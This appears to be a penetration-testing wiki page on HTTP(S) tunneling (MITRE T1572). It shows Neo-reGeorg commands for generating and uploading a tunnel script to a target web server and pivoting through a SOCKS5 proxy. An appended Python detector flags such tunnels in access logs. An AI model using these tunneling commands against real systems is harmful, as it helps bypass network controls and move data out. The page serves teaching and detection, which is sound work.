HTTP(s) Tunneling
MITRE ATT&CK™ Protocol Tunneling - Technique T1572
Theory
HTTP tunneling is a technique that involves encapsulating non-HTTP traffic within HTTP to traverse network restrictions or security measures. It allows data to be transmitted in a way that appears as regular HTTP traffic, making it more likely to pass through firewalls and other filtering mechanisms that may be in place. It's a valuable pivoting technique to consider.
HTTP(S) Tunneling may also be used as an exfiltration channel.
Practice
We will be using Neo-reGeorg to achieve tunneling. On our attacking machine we do:
v4resk@kali$ python3 neoreg.py generate -k 'P@ssw0rd!'
Then, we have to upload the generated files to the target machine and host them on a web server. On the attacking machine we can do:
# Establish SOCKS5 proxy
v4resk@kali$ python3 neoreg.py -k 'P@ssw0rd!' -u http://MACHINE_IP/uploader/files/tunnel.php
# We can now use it as a SOCKS5 proxy
v4resk@kali$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
Chisel is an awesome tool which can be used to quickly and easily set up a tunnelled proxy or port forward. It tunnels connections within the HTTP protocol and uses the SSH protocol within this tunnel to encrypt our data.
For more details, and to learn how to use this tool, please refer to the Port Forwarding page.
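From the defender's side, the Neo-reGeorg setup above leaves a trace in the web server's access log: one client sending a sustained stream of requests to a single script inside an upload directory. The following Python detection is an added example, not part of the original page or of Neo-reGeorg; it assumes combined-format access logs and that the tunnel traffic appears as POST requests, and the path patterns, thresholds and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" \d{3} \S+')
# Assumed patterns: directories that normally hold uploaded content, and server-side script types.
UPLOAD_DIR = re.compile(r'/(uploads?|uploader|files)/', re.I)
SCRIPT = re.compile(r'\.(php|jsp|aspx?|ashx)$', re.I)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_tunnel_candidates(lines, min_posts=30, window=timedelta(seconds=60)):
    """Return {(ip, path): peak POST count within `window`} for pairs reaching min_posts."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if UPLOAD_DIR.search(path) and SCRIPT.search(path):
            hits[(m["ip"], path)].append(datetime.strptime(m["ts"], TS_FMT))
    flagged = {}
    for key, times in hits.items():
        times.sort()
        start = best = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_posts:
            flagged[key] = best
    return flagged

def sample_log():
    """Constructed log lines: one tunnel-like client, one slow form poster, one browsing client."""
    base = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    def row(ip, offset, request):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{request} HTTP/1.1" 200 512'
    lines = [row("192.0.2.10", i, "POST /uploader/files/tunnel.php") for i in range(45)]
    lines += [row("192.0.2.20", i * 40, "POST /uploader/files/form.php") for i in range(5)]
    lines += [row("192.0.2.30", i, "GET /index.php") for i in range(60)]
    return lines

if __name__ == "__main__":
    for (ip, path), count in find_tunnel_candidates(sample_log()).items():
        print(f"possible HTTP tunnel: {ip} -> {path} ({count} POSTs within 60s)")
```

Tune `min_posts` and `window` against a baseline of the site's legitimate upload handlers before alerting on the result.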